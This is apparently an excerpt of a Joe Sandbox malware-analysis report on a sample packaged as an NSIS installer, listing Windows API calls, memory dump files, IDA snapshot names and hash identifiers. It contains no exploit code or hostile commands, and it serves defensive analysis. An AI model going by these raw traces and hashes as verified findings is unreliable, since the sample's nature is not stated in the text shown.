                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-2246974252
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00001606), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                              • Part of subcall function 7014121B: GlobalAlloc.KERNELBASE(00000040,?,7014123B,?,701412DF,00000019,701411BE,-000000A0), ref: 70141225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70142657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 7014268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: d15bb222222d7a59522700308f2538d909389080dbda6cac5395b20dcfa59aa8
                                                                                                            • Instruction ID: d89277672ba33c896eefd02f57aa114cd9e0e3719bfd9b549ff0b2be7198f5e6
                                                                                                            • Opcode Fuzzy Hash: d15bb222222d7a59522700308f2538d909389080dbda6cac5395b20dcfa59aa8
                                                                                                            • Instruction Fuzzy Hash: C231DC72204101DFC7168F51DC94D6E7BBAFB863003B251BDFA4287A34C770A8A5DB65
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp$C:\Users\user\AppData\Local\Temp\nsw4EC8.tmp\System.dll
                                                                                                            • API String ID: 3109718747-709229594
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 16733e7cecacd9c8b23c3aea74f984b17a51d50aa177387067032752bbc078a6
                                                                                                            • Instruction ID: cde439b40adda5f740495f4b2ec063cbdf215e6dee11c913d8e0095547e1da86
                                                                                                            • Opcode Fuzzy Hash: 16733e7cecacd9c8b23c3aea74f984b17a51d50aa177387067032752bbc078a6
                                                                                                            • Instruction Fuzzy Hash: 9851E732D020D59ECB029FA4C9405AD7BBAFB44354B33666DF906E3774D770AE8187A1
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701424D6
                                                                                                              • Part of subcall function 7014122C: lstrcpynW.KERNEL32(00000000,?,701412DF,00000019,701411BE,-000000A0), ref: 7014123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 7014245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 70142477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 39cb599232c0aa35cf1fe1d805619f46904b67ad65dfbbbebaa7ed2ae7a98531
                                                                                                            • Instruction ID: 20caf776d9a1a432cb7fedf733d6fa48161d481d1e2385f3b8d5d9ab7b7e9efd
                                                                                                            • Opcode Fuzzy Hash: 39cb599232c0aa35cf1fe1d805619f46904b67ad65dfbbbebaa7ed2ae7a98531
                                                                                                            • Instruction Fuzzy Hash: BA41BEB1004305DFC310DF21D844A6E77B8FB58320F6559ADF54687AB1EBB4A8C5DB61
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,701421EC,?,00000808), ref: 70141635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,701421EC,?,00000808), ref: 7014163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,701421EC,?,00000808), ref: 70141650
                                                                                                            • GetProcAddress.KERNEL32(701421EC,00000000), ref: 70141657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70141660
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1148316912-0
                                                                                                            • Opcode ID: e6f2d185303f9d7da325a3e523a56c8319413de26242421ef53a440e99725a78
                                                                                                            • Instruction ID: 65430d0b2a6327412792ca2c2d0a33841e10ae59ec9e096cdc62b14432ee9e85
                                                                                                            • Opcode Fuzzy Hash: e6f2d185303f9d7da325a3e523a56c8319413de26242421ef53a440e99725a78
                                                                                                            • Instruction Fuzzy Hash: 61F0AC732061387BD6211BA79C4CDDBBE9CEF8B2F5B210225F728925B086A25D11D7F1
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
